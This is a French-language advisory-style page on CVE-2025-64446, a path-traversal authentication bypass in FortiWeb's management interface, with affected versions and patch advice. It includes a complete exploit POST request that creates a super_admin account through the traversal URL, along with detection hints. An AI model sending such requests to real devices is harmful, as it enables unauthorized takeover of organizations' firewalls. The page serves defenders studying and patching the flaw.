
CVE-2025-64446

Vulnérabilité critique sans authentification permettant à un attaquant distant de créer des comptes administrateur sur les appareils FortiWeb.
CVE-2025-64446 est une vulnérabilité grave de traversée de chemin relative dans l'interface de gestion du pare-feu d'applications web FortiWeb.
Un attaquant distant non authentifié peut exploiter cette faille pour contourner l'authentification et créer de nouveaux utilisateurs administrateur avec tous les privilèges, conduisant à une compromission totale de l'appareil.
Recommandation : Mettez à jour vers la version corrigée la plus récente dès que possible.
Identification de la cible
L'attaquant scanne les interfaces de gestion FortiWeb exposées publiquement (généralement sur les ports HTTPS 443 ou 8443).
Création de la requête malveillante
Le cœur de l'exploit est une traversée de chemin relative (../) combinée à une URL spécialement conçue qui atteint un point d'accès CGI interne non authentifié.
Modèle de point d'accès vulnérable :
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
Envoi de l'exploit
L'attaquant envoie une seule requête POST avec une charge utile JSON pour créer un nouveau compte administrateur.
Exemple de requête d'exploit :
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiweb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
Exploitation réussie
En cas de succès, FortiWeb crée le nouveau compte administrateur sans nécessiter d'authentification préalable. L'attaquant peut alors se connecter avec les identifiants nouvellement créés et prendre le contrôle total du WAF.
L'API de gestion ne nettoie pas correctement le chemin, permettant à la requête de traverser en arrière jusqu'au binaire fwbcgi hérité, qui n'impose pas d'authentification pour certaines opérations.
fwbcgi, ../ ou des tentatives inhabituelles de création d'administrateurÀ des fins éducatives et de recherche défensive en sécurité uniquement.
Fait avec ❤️ pour la communauté de la cybersécurité
Dernière mise à jour : avril 2026
| Produit | Versions affectées | Version corrigée |
|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 et ultérieure |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 et ultérieure |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 et ultérieure |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 et ultérieure |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 et ultérieure |